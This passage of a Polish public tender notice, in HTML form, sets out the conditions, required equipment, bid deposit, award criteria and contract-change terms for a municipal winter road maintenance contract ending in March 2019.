Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">PLN</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">4)	Zgodnie z art. 67 ust. 1 pkt 6 ustawy Pzp Zamawiający przewiduje udzielanie zamówienia, jednakże w wysokości nie większej niż 5% wartości zamówienia podstawowego i polegającego na powtórzeniu podobnych usług zgodnych z przedmiotem zamówienia. Warunkiem udzielenia zamówień, o których mowa w zdaniu pierwszym jest posiadanie środków finansowych na ich wykonanie. Na okoliczność ich wystąpienia, zostanie zawarta umowa w trybie zamówienia z wolnej ręki. </span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2019-03-31</span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2019-03-31</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie precyzuje tego warunku</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie precyzuje tego warunku</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Warunek posiadania zdolności technicznej lub zawodowej zostanie spełniony jeśli Wykonawca:Dotyczy Wykonawców, którzy składają ofertę na I część zamówienia. 1) Wykonawca ubiegający się o udzieleni zamówienia zobowiązany jest wykazać się wykonaniem, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem minimum 1 usługi polegającej na zimowym utrzymania dróg i ulic o wartości usługi co najmniej 80 000,00 zł brutto lub 2 usług polegających na zimowym utrzymania dróg i ulic, o wartości każdej z usług nie mniejszej niż 40 000,00 zł brutto.2) Wykonawca musi wykazać, że przy realizacji zamówienia będzie dysponował sprzętem i środkami transportu:a) samochód ciężarowy z pługiem odśnieżającym i piaskarką - minimum 1 szt.b) ciągnik rolniczy z pługiem odśnieżającym - minimum 3 szt.c) odśnieżnik spalinowy - minimum 2 szt.d) samochód ciężarowy o ładowności minimalnej 5 ton - minimum 1 szt.e) samochód ciężarowy o ładowności do 3,5 tony - minimum 3 szt.f) solarka - 1 szt.Dotyczy Wykonawców, którzy składają ofertę na II część zamówienia. 1) Wykonawca ubiegający się o udzieleni zamówienia zobowiązany jest wykazać się wykonaniem, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem minimum 1 usługi polegającej na zimowym utrzymania dróg i ulic o wartości usługi co najmniej 80 000,00 zł brutto lub 2 usług polegających na zimowym utrzymania dróg i ulic, o wartości każdej z usług nie mniejszej niż 40 000,00 zł brutto.2) Wykonawca musi wykazać, że przy realizacji zamówienia będzie dysponował sprzętem i środkami transportu:a) samochód ciężarowy z pługiem odśnieżającym i piaskarką - minimum 1 szt.b) ciągnik rolniczy z pługiem odśnieżającym - minimum 3 szt.c) samochód ciężarowy o ładowności do 3,5 tony - minimum 3 szt.Zamawiający może na każdym etapie postępowania uznać, ze Wykonawca nie posiada wymaganych zdolności jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.W przypadku wykonania usług, których wartość wyrażona jest w innej walucie niż PLN, walutę tę należy przeliczyć na PLN według kursu NBP na dzień publikacji w BZP ogłoszenia o zamówieniu. Kurs walut należy ustalić wg. tabeli kursów średnich walut obcych opublikowanych na stronie www.nbp.pl. Wykonawca może polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów pod warunkiem, że podmioty te zrealizują usługę , do realizacji których te zdolności są wymagane. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły ,,spełnia - nie spełnia", w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Zgodnie z art. 26 ust. 2 Pzp Zamawiający przed udzieleniem zamówienia wezwie Wykonawcę lub Wykonawców występujących wspólnie, których oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni terminie aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 Pzp, tj.:W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznych lub zawodowych Wykonawca złoży:1) Wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składnia ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przed podmiot, na rzecz którego dostawy lub usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Proponuje się aby wykaz sporządzić zgodnie z Załącznikiem nr 7.2)Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami. W przypadku wskazania przez Wykonawcę, że dokument, o którym mowa w pkt.1 znajduje się w posiadaniu Zamawiającego, Zamawiający w celu potwierdzenia okoliczności, o którym mowa art. 25 ust. 1 pkt.1 i 2 korzysta z posiadanych oświadczeń lub dokumentów, o ile są one aktualne. Oświadczenia, o których mowa w Rozporządzeniu Ministra Rozwoju z 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy w postępowaniu o udzielenie zamówienia dotyczące Wykonawcy i innych podmiotów, na których zdolnościach lub sytuacji polega Wykonawca na zasadach określonych w art. 22a Pzp oraz dotyczące podwykonawców składane są w oryginale. Dokumenty, o których mowa w rozporządzeniu, inne niż oświadczenia składane są w oryginale lub kopii poświadczonej za zgodność z oryginałem. Poświadczenia za zgodność z oryginałem dokonuje odpowiednio Wykonawca, podmiot, na którego zdolności lub sytuacji polega Wykonawca, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albo podwykonawca, w zakresie dokumentów, które każdego z nich dotyczą. </span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Zamawiający zgodnie z art. 45 ust. 2 Pzp żąda wniesienia wadium w wysokości 2.000,00 zł, słownie: dwa tysiące złotych. Wadium można wnieść w jednej z form wymienionych w art. 45 ust. 6 Pzp. Jeżeli wadium wnoszone jest w pieniądzu, Wykonawca wpłaca je przelewem na rachunek bankowy Zamawiającego 87 8173 0005 2001 0000 0303 0003. Jeżeli wadium jest wnoszone w innej formie niż pieniądzu, Wykonawca winien kopię dokumentu potwierdzającego wniesienie wadium, potwierdzoną za zgodność z oryginałem wpiąć do oferty, a oryginał dokumentu złożyć przed upływem termonu składania ofert w siedzibie Zamawiającego Urząd Gminy, Plac Św. Rocha 5, 86 - 170 Nowe, pokój nr 26.Jeżeli wadium nie zostanie wniesione lub zostanie wniesione w sposób nieprawidłowy, Zamawiający na podstawie art. 89 ust. 7b odrzuca ofertę. Wadium musi być wniesione na cały okres związania ofertą.Zamawiający zwraca wadium na warunkach określonych w art. 46 ust. 1-2,4 Pzp. Zamawiający zatrzymuje wadium w okolicznościach, o których mowa w art. 46 ust. 4a,5 Pzp. </span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow">Nie</span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow">Nie</span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci">Nie</span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Aspekty środowiskowe</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie">Nie</span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial">Nie</span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">W wyniku przeprowadzonego postępowania zostanie zawarta umowa wg. wzoru umowy stanowiącego Załącznik Nr 9 do SIWZ. Ewentualne zmiany umowy opisane są w § 4 wzoru umowy oraz w przypadku podwykonawstwa w § 6 wzoru umowy. 1.	Zamawiający dopuszcza zmianę postanowień zawartych w umowie w następującym zakresie: Strony przewidują możliwość zmiany umowy w zakresie wynagrodzenia w następujących przypadku zmiany stawki podatku od towarów i usług,2.	Wykonawca powiadamia drugą stronę umowy o wystąpieniu przyczyn opisanych w ust. 1, skutkujących zmianą wysokości ustalonego w umowie wynagrodzenia, w formie pisemnej, wskazując podstawę zmiany, szczegółowe wyliczenie proponowanej wysokości wynagrodzenia oraz zasady i metody jego obliczenia, a także udokumentuje jej wpływ na koszty wykonania zamówienia w terminie 30 dni od dnia wejścia w życie przepisów wprowadzających zmianę. W terminie 7 dni od otrzymania od Wykonawcy dokumentów, o których mowa w zdaniu poprzedzającym Zamawiający może żądać przedłożenia wyjaśnień, uzupełnień a także przedłożenia dodatkowych dokumentów dla oceny prawidłowości zasadności zmiany wynagrodzenia Wykonawcy. Badanie zasadności zmiany wynagrodzenia Wykonawcy nie może trwać dłużej niż 7 dni od dnia udostępnienia Zamawiającemu uzupełnionych dokumentów.3.	Zmiana wynagrodzenia może wynikać tylko ze zmian mających miejsce w trakcie realizacji 